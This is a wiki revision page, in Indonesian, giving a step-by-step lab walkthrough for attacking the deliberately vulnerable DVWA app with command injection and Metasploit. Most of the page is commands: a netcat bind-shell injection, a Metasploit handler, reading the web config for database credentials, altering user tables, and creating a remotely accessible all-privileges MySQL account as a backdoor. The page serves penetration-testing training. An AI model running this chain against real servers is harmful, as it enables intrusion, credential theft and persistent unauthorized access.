Difference between revisions of "DVWA: Exploit menggunakan Metasploit"

From OnnoWiki
Jump to navigation Jump to search
(New page: ==Persiapan== Masuk ke DVWA, misalnya http://192.168.0.80/DVWA-1.9 username admin password password Klik DVWA Security > Security Level Low > Submit)
 
 
(8 intermediate revisions by the same user not shown)
Line 1: Line 1:
 +
Sumber: https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html
 +
 
==Persiapan==
 
==Persiapan==
  
Line 11: Line 13:
  
 
  DVWA Security > Security Level Low > Submit
 
  DVWA Security > Security Level Low > Submit
 +
 +
 +
==Siapkan NetCat==
 +
 +
Masuk ke DVWA Command Injection, lakukan
 +
 +
192.168.0.100;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
 +
 +
Dimana 192.168.0.100 adalah IP address server DVWA
 +
 +
Teknik ini akan membuka server pada port 4444 menggunakan NC ....
 +
Ini tempat masuk bagi Metasploit.
 +
 +
==Gunakan metasploit==
 +
 +
Jalankan
 +
 +
msfconsole thankyou
 +
 +
Lakukan
 +
 +
 +
use multi/handler
 +
set PAYLOAD linux/x86/shell/bind_tcp
 +
show options
 +
set RHOST 192.168.0.100
 +
exploit
 +
 +
Cek password
 +
 +
whoami
 +
grep www-data /etc/passwd
 +
grep www-data /etc/group
 +
 +
 +
Cek Password melalui konfigurasi Web
 +
 +
ps -eaf | grep http
 +
pwd
 +
ls -ld /var/www/html
 +
ls -ld /var/www/html/DVWA*
 +
ls -l /var/www/html/DVWA*
 +
 +
Cari password database
 +
 +
ls -l /var/www/html/DVWA-1.9/config
 +
cat /var/www/html/DVWA-1.9/config/config.inc.php
 +
 +
Explorasi database, asumsi username MySQL root, password 123456
 +
 +
 +
echo "show databases;" | mysql -uroot -p123456
 +
echo "use dvwa; show tables;" | mysql -uroot -p123456
 +
echo "use dvwa; desc users;" | mysql -uroot -p123456
 +
echo "select * from dvwa.users;" | mysql -uroot -p123456
 +
 +
Buat user baru
 +
 +
echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -p123456
 +
echo "select * from dvwa.users;" | mysql -uroot -p123456
 +
 +
Lihat informasi tabel MySQL
 +
 +
 +
echo "show databases;" | mysql -uroot -p123456
 +
echo "use mysql; show tables;" | mysql -uroot -p123456
 +
 +
Ini bagian paling berbahaya, buat user MySQL yang baru
 +
 +
echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot -p123456
 +
echo "select * from mysql.user;" | mysql -uroot -p123456
 +
 +
Perintah diatas akan membuat user db_hacker yang bisa akses dari mana saja (%), dengan password abc123 ke MySQL :( ..
 +
 +
==Cek dari console Kali Linux==
 +
 +
mysql -u db_hacker -h 192.168.0.100 -pabc123
 +
show databases;
 +
quit
 +
 +
==Referensi==
 +
 +
* https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html

Latest revision as of 04:18, 4 May 2017

Sumber: https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html

Persiapan

Masuk ke DVWA, misalnya

http://192.168.0.80/DVWA-1.9
username admin
password password

Klik

DVWA Security > Security Level Low > Submit


Siapkan NetCat

Masuk ke DVWA Command Injection, lakukan

192.168.0.100;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe

Dimana 192.168.0.100 adalah IP address server DVWA

Teknik ini akan membuka server pada port 4444 menggunakan NC .... Ini tempat masuk bagi Metasploit.

Gunakan metasploit

Jalankan

msfconsole thankyou

Lakukan


use multi/handler
set PAYLOAD linux/x86/shell/bind_tcp
show options
set RHOST 192.168.0.100
exploit

Cek password

whoami
grep www-data /etc/passwd
grep www-data /etc/group


Cek Password melalui konfigurasi Web

ps -eaf | grep http
pwd
ls -ld /var/www/html
ls -ld /var/www/html/DVWA*
ls -l /var/www/html/DVWA*

Cari password database

ls -l /var/www/html/DVWA-1.9/config
cat /var/www/html/DVWA-1.9/config/config.inc.php

Explorasi database, asumsi username MySQL root, password 123456


echo "show databases;" | mysql -uroot -p123456
echo "use dvwa; show tables;" | mysql -uroot -p123456
echo "use dvwa; desc users;" | mysql -uroot -p123456
echo "select * from dvwa.users;" | mysql -uroot -p123456

Buat user baru

echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -p123456
echo "select * from dvwa.users;" | mysql -uroot -p123456

Lihat informasi tabel MySQL


echo "show databases;" | mysql -uroot -p123456
echo "use mysql; show tables;" | mysql -uroot -p123456

Ini bagian paling berbahaya, buat user MySQL yang baru

echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot -p123456
echo "select * from mysql.user;" | mysql -uroot -p123456

Perintah diatas akan membuat user db_hacker yang bisa akses dari mana saja (%), dengan password abc123 ke MySQL :( ..

Cek dari console Kali Linux

mysql -u db_hacker -h 192.168.0.100 -pabc123
show databases;
quit

Referensi